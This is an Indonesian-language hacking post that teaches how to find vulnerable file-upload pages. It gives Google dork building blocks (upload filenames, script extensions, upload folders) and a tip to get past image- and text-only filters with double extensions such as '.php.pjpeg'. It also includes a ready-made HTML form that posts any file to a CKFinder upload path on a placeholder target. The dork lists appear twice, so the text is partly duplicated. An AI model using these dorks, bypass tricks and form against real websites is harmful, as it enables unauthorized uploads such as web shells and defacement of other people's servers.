DORK Upload file Vulnerability
Oleh
chmood
Bahan²
- Dork * upload.html
* Upload.htm
* Upload.php
* Upload.phtml
* Uploads.html
* Uploads.php
kalau belum punya
Bahan² untuk racik dork :
Filename :
- upload
- uploader
- uploadfile
- upload_file
- uploadform
- upload_form
- formupload
- form_upload
- fileupload
- file_upload
- fileuploader
- file_uploader
* Tambahin lagi kalo ada
File extension :
- .htm
- .html
- .php
- .phtml
- .asp
- .aspx
- .cgi
* Tambahin lagi kalo ada
Access folder :
- /upload
- /uploads
- /file
- /files
* Tambahin lagi kalo ada
Note :
kalo ketemu uploader yang JPEG, TXT itu jangan di skip,
biasanya bisa di bypass, .php.pjpeg, .php.txt
- Dork * upload.html
* Upload.htm
* Upload.php
* Upload.phtml
* Uploads.html
* Uploads.php
copy.html
<html >
<head>
<title>./75n1</title>
</head>
<body>
<center>
<p style="font-weight:bold">Ustazah</p>
<img src="http://i.imgur.com/fl2HqAw.jpg" alt="gambar" class="bg" />
<br><br>
<form method="POST" action="http://target.com.net/admin/app/webroot/plugin/ckeditor/ckfinder/ckfinder.html"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button> Bantai !!!</button>
</form></center>
</body>
</html>
kalau belum punya
Bahan² untuk racik dork :
Filename :
- upload
- uploader
- uploadfile
- upload_file
- uploadform
- upload_form
- formupload
- form_upload
- fileupload
- file_upload
- fileuploader
- file_uploader
* Tambahin lagi kalo ada
File extension :
- .htm
- .html
- .php
- .phtml
- .asp
- .aspx
- .cgi
* Tambahin lagi kalo ada
Access folder :
- /upload
- /uploads
- /file
- /files
* Tambahin lagi kalo ada
Note :
kalo ketemu uploader yang JPEG, TXT itu jangan di skip,
biasanya bisa di bypass, .php.pjpeg, .php.txt
Komentar